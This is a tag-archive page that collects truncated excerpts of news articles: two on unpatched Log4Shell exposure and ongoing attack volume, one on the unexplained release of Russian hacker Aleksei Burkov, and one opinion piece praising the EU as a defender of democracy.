Tag Archive for: remains

Public interest in Log4Shell fades but attack surface remains

/in


log4shell

It’s been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.

Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits, Log4Shell continues to be a large-scale problem and a grave security risk.

The last time we touched the subject of Log4Shell exploitation was roughly two months ago when a Barracuda report highlighted that it was primarily botnets that leveraged it for DDoS and cryptocurrency mining.

However, a new report published today by Rezilion paints a dire picture, revealing a large attack surface across a wide range of software products.

This is a severe problem due to its potential impact (remote code execution) and the ease of exploitation (availability of PoCs).

Log4Shell bug discovery and fixing timeline
Log4Shell bug discovery and fixing timeline (Rezilion)

A problem that’s still there

According to Rezilion’s report, which presents data from various points, Log4Shell, tracked as CVE-2021-44228, is still present in so many software products that formulating a logical explanation is challenging.

For example, when looking into Sonatype’s Log4j Download Dashboard, we see that a steady percentage of almost 40% is still downloading vulnerable Log4j versions even at the end of April.

Log4j version downloads
Log4j version downloads (Sonatype)

While this was previously attributed to security researchers, analysts, or even threat actors testing their exploits, the persistence of the percentage on high levels after all this time excludes these scenarios.

When looking into data from Google’s Open Source Insights service, Rezilion found that out of the 17,840 open-source packages using Log4j as a dependency, only 7,140 had upgraded to a fixed version. Hence, 60% of them remain vulnerable to Log4Shell.

Open-source software using vulnerable Log4j versions
Open-source software using vulnerable Log4j versions (Rezilion)

When searching for the particular category of open-source containers on Shodan, Rezilion found over 90,000 potentially vulnerable internet-facing apps that contain obsolete versions of Log4j. A notable example is Apache Solr, counting 1,657 public deployments…

Source…

Mystery remains on why US released prominent Russian hacker

/in


The Justice Department has declined to provide a clear explanation as to why a well-known Russian hacker was released home last year amid warnings from President Joe Biden that the Kremlin may soon carry out cyberattacks against the United States.

Aleksei Burkov is a cybercriminal who ran two noted underground hacking operations. After he was arrested by Israeli law enforcement in 2015, the Kremlin put a lot of effort into stopping him from being extradited to the U.S. Burkov eventually arrived in the U.S. in 2019, where he pleaded guilty to a host of crimes and received a nine-year sentence, though given credit for the time spent in Israeli prison.

But he was mysteriously deported back to Russia in late September, years before the sentence was completed.

Bryan Vorndran, the assistant director of the FBI’s Cyber Division, was unable to explain why during a House Judiciary Committee hearing Tuesday when pressed by Rep. Jim Jordan, an Ohio Republican.

“Mr. Burkov was investigated by the U.S. Secret Service, not by the FBI,” Vorndran said. “I don’t know specifics. What I do know is that there was no swap or concession.”

He said it was “a Department of Justice question” when asked why Burkov was let go.

Jordan asked if letting Burkov go was a good idea, and he replied he wasn’t in a position to comment, leading the Ohio Republican to say, “The head of cyber is not in a position to comment.” Vorndran said only that “it was a Department of Justice decision through the U.S. courts process.”

Jordan asked, “Do you think it helps to release the most notorious Russian hacker we’ve ever apprehended?”

“I’m not going to answer any questions about Mr. Burkov,” Vorndran replied. “It’s a Secret Service case.”

RUSSIA AND CHINA DOUBLE DOWN ON PARTNERSHIP AMID UKRAINE INVASION

President Joe Biden spoke at a business roundtable last week in which he warned about the likelihood Putin would deploy cyberattacks.

“As I’ve said, the magnitude of Russia’s cyber capacity is fairly consequential,…

Source…

Log4Shell threat remains extremely high

/in


The quantity of cyber attacks targeting the Log4Shell complex of vulnerabilities in Log4j still remains extremely high, according to Barracuda Networks. 

New Threat Spotlight analysis from cloud-enabled security solutions provider Barracuda Networks says that while he Log4Shell vulnerabilities have now been around for more than two months, the volume of attacks attempting to exploit these vulnerabilities has remained relatively constant, with a few dips and spikes, over the past two months.

It is predicted that this attack pattern will continue, given the popularity of the software, the exploitability of the vulnerability, and the payoff when a compromise happens.

Geographically, Barracuda Networks uncovered that 83 per cent of the attacks on their systems came from IP addresses in the United States, with 50 per cent being associated with Amazon Web Services and other large data centres.

Threats analysed also came from Japan, Germany, Netherlands, and Russia.

The UK National Cyber Security Centre have previously advised individuals and businesses to be wary of the threat and to ensure all devices are regularly updated.

Log4Shell is a Java-based error logging audit framework which is an Apache project, and is utilised by many major organisations such as Apple, Amazon and Twitter. Hackers can breach devices running the vulnerabilities to break into IT systems and steal passwords, extract data and infect networks with malicious software.

Researchers at Barracuda Networks found a variety of threats ranging from videos of Rick Astley’s Never Gonna Give You Up, cryptocurrency mining payloads, and Distributed Denial of Service (DDoS) malware. They predict that threat actors are working to build out a large botnet and there should be an expectation of large DDoS attacks in the near future.

“Due to the growing number of vulnerabilities found in web applications, it is getting progressively more complex to guard against attacks,” said Tushar Richabadas, product marketing manager, Barracuda Networks.

“The best way to protect against Log4Shell specifically is to upgrade to the latest version of Log4J. Maintaining up-to-date software and libraries helps ensure that…

Source…

The EU Remains the Best Advocate for Global Democracy

/in


Russian president Vladimir Putin enjoys running circles around the European Union (EU). China may cherry-pick partners among EU members. Turkey can destabilize the region by releasing migrants. Even Belarus challenges the EU in a way unthinkable only a few years ago. Events may yet take a turn for the worse in the Caucasus, Bosnia-Herzegovina, and Ukraine with rumors of military action launched by Russia.

Europe’s lack of hard power may be laid bare in the months to come. Europe is not projecting military power, not invading other countries, not threatening neighbors, not waging cyber warfare, and not operating a global intelligence network. It is also not using its considerable economic power to pursue political goals.

These weaknesses, in a strange way, also reveal Europe’s sole strength.

Europe is gradually becoming the last genuine defender of democracy and human rights. A few countries outside of Europe may also claim this title, but they are far between. Europe is not flawless, but compared to illiberal democracies, autocratic or authoritarian regimes, it remains a beacon.

The EU is often depicted as an undemocratic bureaucracy run by technocrats in Brussels. This is incorrect. No decision is taken by the EU without approval in the European Council. Each member state is represented by a minister sent by their national government and held accountable by their national parliament. Most decisions require the consent of both the Council and the European Parliament, which is composed of 705 members elected directly by the European people. This relationship between the Council and the Parliament is somewhat akin to that of the Senate and the House of Representatives in the United States, but less confrontational. The European Commission, the executive institution of the EU, consists of one member nominated by each member state. The Commission can only take office after a vote of approval in the directly elected European Parliament. The Parliament also has the ability to dismiss and dissolve the European Commission.

Several countries in Central and Eastern Europe are not role models of democracy. But this critique is overblown. Observers outside Central and Eastern Europe…

Source…